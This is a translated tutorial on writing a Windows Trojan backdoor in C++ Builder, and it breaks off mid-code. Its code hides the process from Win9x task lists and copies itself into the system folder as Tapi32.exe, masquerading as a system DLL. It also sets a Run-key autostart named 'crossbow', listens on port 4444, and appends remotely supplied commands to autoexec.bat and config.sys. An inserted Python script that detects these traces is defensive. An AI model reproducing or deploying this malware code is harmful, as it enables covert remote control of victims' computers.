How a Trojan is written. By Zhou Kan / Chinese Software. When reproducing this document, please keep it intact and credit the source. Welcome to C++ Builder Research, http://www.ccrun.com/doc/go.asp?Id=163

Trojan horse: a name that has caused a great many people no end of trouble, and one that hackers have put to use for a long time. Trojans struck Chinese netizens who had grown up in the DOS and Windows era like a thunderclap out of a clear sky, waking them from the dream of a colourful network and making them see that the network has an evil side too. I once read an article in Computer Daily about a newcomer whose machine had been taken over by BO; he was so frightened that for days he could neither eat nor sleep. You should know that Trojans have a long history. As early as AT&T UNIX and BSD UNIX, Trojans were written, by very capable young people (and mostly older ones), in C or in shell, basically to steal the password of the login host and so obtain higher privileges. The main technique at that time was deception: first modify the victim's .profile and implant the Trojan there; when the victim logs in, the Trojan saves the password characters typed to a file and mails them to the attacker's mailbox.

Young people in China grew up on pirated DOS and knew next to nothing about networks. Not until Win9x was born, and especially until WinNT became popular and networking took off, did BO give the Chinese public a real shock, even though it is a rather simple, one might even say crude, Trojan (its process is visible even in the Win9x "Close Program" dialog). It can fairly be called an epoch-making program in Chinese network security.

Writing your own Trojan: is that cool?! A Trojan consists of two parts, a server program (Server) and a client program (Client). The server runs on the victim and opens the way for the attack, like a traitor inside the walls; the client is what the attacker uses against the target. The two need a network protocol to talk to each other (typically TCP/IP).
To help everyone see through the mystery of Trojans and strip it away, I will discuss the technique of writing a Trojan and write an example Trojan, so that everyone can better guard against and kill the various known and unknown Trojans.

First, the choice of programming tool. The popular development tools today are C++ Builder, VC, VB and Delphi. Here we use C++ Builder (hereafter BCB). VC is good, but GUI design in it is too involved; to keep the example focused on the basic principles of a Trojan we use the visual BCB. Delphi is also good, but it has the defect that it cannot reuse existing resources (for example the BO2000 source code published by the Cult of the Dead Cow hacker group is written in C++, and I will borrow from it). As for VB, let us not even discuss it: do you really want to hand the victim a runtime dynamic link library of more than 1 MB, MSVBVM60.DLL, along with the Trojan?

Start C++ Builder 5.0 Enterprise Edition, create a new project and add three VCL controls: ServerSocket from the Internet page, and NMFTP and NMSMTP from the FastNet page.
ServerSocket turns the program into a server, one that can listen and serve (open the door for the attacker). Sockets first appeared on UNIX; Microsoft later brought them into Windows (Win98 and WinNT included). The other two controls give the program FTP (File Transfer Protocol) and SMTP (Simple Mail Transfer Protocol) capability, so that it can upload and download files and send e-mail; you know that remote-control software has exactly these features.

A visible Form is of course out of the question. It is not lightweight (a single Form costs some 300K of executable), and a Trojan that shows itself is useless. So when you actually write a Trojan you can use a few tricks to build the program without any Form at all, just as a Trojan written in Delphi purely with procedures is only about 17K.

First let our program hide itself. Double-click the Form and, in the FormCreate event, add code that hides the Trojan from the Win9x "Close Program" dialog. That sounds mysterious, but it is only a matter of being a background process called a service, which runs at a higher priority and sits very close to the system, like a device driver. So as long as our program is registered in the process database as a service process, it no longer appears in that dialog. On Win9x this is done with RegisterServiceProcess(), exported by KERNEL32.DLL. This function is not declared in the headers Borland ships, however, so we have to declare it ourselves and fetch it from kernel32.dll at run time.
First determine whether the target machine runs Win9x or WinNT:

    DWORD dwVersion = GetVersion();          // get the operating system version number
    if (dwVersion >= 0x80000000)             // high bit set: the OS is Win9x, not WinNT
    {
        // declare the prototype of RegisterServiceProcess(); Borland's headers do not have it
        typedef DWORD (CALLBACK *LPREGISTERSERVICEPROCESS)(DWORD, DWORD);
        HINSTANCE hDLL;
        LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
        hDLL = LoadLibrary("KERNEL32");      // load the dynamic link library that holds RegisterServiceProcess
        lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL, "RegisterServiceProcess"); // get its address
        if (lpRegisterServiceProcess != NULL)                  // only Win9x exports it; never call a NULL pointer
            lpRegisterServiceProcess(GetCurrentProcessId(), 1); // call RegisterServiceProcess() to hide this process
        FreeLibrary(hDLL);                   // unload the library
    }

With that the program is finally stealthy (and what a lot of code it took to type!). Why test the operating system? Because the Task Manager on WinNT can see the current process regardless, so the code above is of no use under WinNT (other methods exist for NT; we leave them for later). There is a second reason: the kernel32.dll of WinNT does not export RegisterServiceProcess at all, so GetProcAddress returns NULL there. The NULL check above keeps the program from crashing on its very first start should the version test ever be wrong.
Then copy yourself into the %system% directory (for example c:\windows\system) and modify the registry so that the program is loaded automatically at startup:

    char TempPath[MAX_PATH];                       // buffer for the directory path
    GetSystemDirectory(TempPath, MAX_PATH);        // TempPath receives the target machine's SYSTEM directory, MAX_PATH is the buffer size
    SystemPath = AnsiString(TempPath);             // SystemPath is an AnsiString at form scope; the socket handler reuses it
    // copy ourselves into %system%, renamed to Tapi32.exe as camouflage
    CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath + "\\Tapi32.exe").c_str(), FALSE);
    TRegistry *Registry = new TRegistry;           // TRegistry object, ready to modify the registry; this step is essential
    Registry->RootKey = HKEY_LOCAL_MACHINE;        // set the root key to HKEY_LOCAL_MACHINE
    // open Software\Microsoft\Windows\CurrentVersion\Run, creating it if it does not exist
    Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", TRUE);
    try   // if the statements below throw, jump to catch so the program does not crash
    {
        // check whether the value "crossbow" already points at our copy %system%\Tapi32.exe; if not, write it
        if (Registry->ReadString("crossbow") != SystemPath + "\\Tapi32.exe")
            Registry->WriteString("crossbow", SystemPath + "\\Tapi32.exe");
    }
    catch (...)
    {
        // on any error, do nothing
    }
    delete Registry;

Good, FormCreate is now complete. Tapi32.exe will be loaded at every boot, and its process cannot be seen in the "Close Program" dialog: the Trojan has taken its first step. Next select the ServerSocket control and, in the Object Inspector on the left, set Active to TRUE so that the program opens a specific port and runs as a server. Set Port to 4444; this is the Trojan's port number, and of course you may use another.
Be careful, though, not to use a low port below 1024: not only may it conflict with the ports used by the basic network protocols, it is also easy to spot, so prefer a high port above 1024. (There is also a technique of deliberately using a specific well-known port; the author's point is that Windows reports no error if it conflicts. Bear in mind that a listen on a port another program has already bound normally fails with WSAEADDRINUSE, so check that Active really did become TRUE rather than assuming the server came up.) For reference, look at the Port property of the TNMFTP control, which is 21, the FTP control port; the Port of TNMSMTP is likewise 25, the port dedicated to SMTP.
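The two steps above leave two footprints on the victim: a Run value under HKEY_LOCAL_MACHINE that launches an .exe from %system% whose name imitates a system DLL (Tapi32.exe next to the genuine tapi32.dll), and a TCP listener on a port the workstation has no business serving. The following script is an added example, not code from the original article: it runs both checks over a constructed .reg export of the Run key and a constructed `netstat -an` listing so that it works offline. The value name "crossbow", the port 4444 and the Tapi32.exe name come from the article; the list of system DLL stems and the set of expected listening ports are assumptions for the example and would be extended on a real host, where the inputs would come from `regedit /e` and `netstat -an`.

```python
"""
Added example (not from the original article): triage of the two footprints
the Trojan described above leaves on a host, run over CONSTRUCTED sample data
so it works offline.  Footprint 1 is the Run value under HKEY_LOCAL_MACHINE
that starts an .exe in %system% named after a system DLL (Tapi32.exe beside
the real tapi32.dll).  Footprint 2 is a TCP listener on a port the
workstation is not expected to serve (4444 here).
"""
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed sample: what `regedit /e` writes for the Run key (.reg format
# doubles backslashes).  Two benign Win98 entries plus the Trojan's "crossbow".
RUN_KEY_EXPORT = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"ScanRegistry"="C:\\WINDOWS\\scanregw.exe /autorun"
"crossbow"="C:\\WINDOWS\\SYSTEM\\Tapi32.exe"
'''

# Constructed sample: `netstat -an` on the same host, NetBIOS plus the Trojan.
NETSTAT_OUTPUT = '''
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1035      203.0.113.5:80         ESTABLISHED
  UDP    0.0.0.0:137            *:*
'''

# Assumptions for the example: a short list of DLL stems that live in %system%
# (an .exe reusing one is a masquerade signal) and the ports a plain Win9x
# workstation legitimately listens on.  Extend both on a real host.
SYSTEM_DLL_STEMS = {"tapi32", "kernel32", "user32", "gdi32", "advapi32", "wsock32"}
EXPECTED_LISTEN_PORTS = {137, 138, 139}

_REG_VALUE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"\s*$', re.M)
_LISTENER = re.compile(r'^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s*$', re.M)


def parse_run_key(reg_text: str) -> Dict[str, str]:
    """Map value name -> command line from a .reg export of the Run key."""
    return {name: raw.replace('\\\\', '\\')          # undo .reg backslash escaping
            for name, raw in _REG_VALUE.findall(reg_text)}


def executable_of(command: str) -> str:
    """First token of a Run command: a quoted path, or up to the first space."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(None, 1)[0]


def flag_run_entries(entries: Dict[str, str], system_dir: str) -> List[Tuple[str, str]]:
    """Flag Run entries that start an .exe from %system% (or an unqualified name,
    which the loader resolves through %system%) whose stem collides with a system DLL."""
    flagged = []
    for name, command in entries.items():
        exe = executable_of(command)
        directory = ntpath.dirname(exe).lower()
        stem, ext = ntpath.splitext(ntpath.basename(exe).lower())
        in_system = directory in ("", system_dir.lower())
        if in_system and ext == ".exe" and stem in SYSTEM_DLL_STEMS:
            flagged.append((name, f"{exe}: .exe named after system DLL {stem}.dll"))
    return flagged


def parse_listeners(netstat_text: str) -> List[Tuple[str, int]]:
    """(local address, port) for every TCP socket in LISTENING state."""
    return [(addr, int(port)) for addr, port in _LISTENER.findall(netstat_text)]


def unexpected_listeners(listeners: List[Tuple[str, int]]) -> List[int]:
    """Listening ports outside the expected set, sorted."""
    return sorted({port for _, port in listeners if port not in EXPECTED_LISTEN_PORTS})


def triage(reg_text: str, netstat_text: str, system_dir: str) -> Dict[str, list]:
    """Run both checks and return the findings together."""
    return {
        "run_key": flag_run_entries(parse_run_key(reg_text), system_dir),
        "listeners": unexpected_listeners(parse_listeners(netstat_text)),
    }


if __name__ == "__main__":
    for kind, hits in triage(RUN_KEY_EXPORT, NETSTAT_OUTPUT, r"C:\WINDOWS\SYSTEM").items():
        print(kind, hits)
```

Neither check proves infection on its own: the DLL-stem heuristic is a naming signal and the port set is policy, so the two findings are reported together and a hit in both is what should trigger a closer look at the flagged binary.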
Select the ServerSocket control, click the Events page, double-click the OnClientRead event and type in the following code:

    FILE *fp = NULL;
    AnsiString content;
    int Times_of_Try;
    char TempFile[MAX_PATH];                 // a handful of variables we will need below
    // path of a text file win369.bat under %system%
    sprintf(TempFile, "%s", AnsiString(SystemPath + "\\win369.bat").c_str());
    AnsiString Temp = Socket->ReceiveText(); // receive the data sent by the client (the attacker, that is, yourself)

With that the door is open! What remains is to modify the target machine's various configurations. ^_^ First let us modify autoexec.bat and config.sys:

    if (Temp.SubString(1, 9) == "edit conf")   // the first 9 characters received are "edit conf"
    {
        int Number = Temp.Length();            // length of the whole command
        // the 11th character, converted to an integer, selects the file (the 10th is a space)
        int file_name = atoi(Temp.SubString(11, 1).c_str());
        // the rest of the string, plus a newline, is what gets written to the target file
        content = Temp.SubString(12, Number - 11) + '\n';
        char FileName[20];
        chmod("c:\\autoexec.bat", S_IREAD | S_IWRITE); // make both target files readable and writable
        chmod("c:\\config.sys", S_IREAD | S_IWRITE);
        if (file_name == 1)
            sprintf(FileName, "%s", "c:\\autoexec.bat"); // 11th character 1: the target is autoexec.bat
        else if (file_name == 2)
            sprintf(FileName, "%s", "c:\\config.sys");   // 11th character 2: the target is config.sys
        // note: any other value leaves FileName unset; the code shown here does not handle it
        Times_of_Try = 0;                        // retry counter
        while (fp == NULL)                       // fp stays NULL for as long as fopen keeps failing
        {
            fp = fopen(FileName, "a+");          // create the file if it does not exist; otherwise prepare to append
            Times_of_Try = Times_of_Try + 1;     // count this attempt
            if (Times_of_Try > 100)              // after 100 failed attempts give up
            {
                Socket->SendText("Fail By Open File"); // send the error message back to the client
                goto end;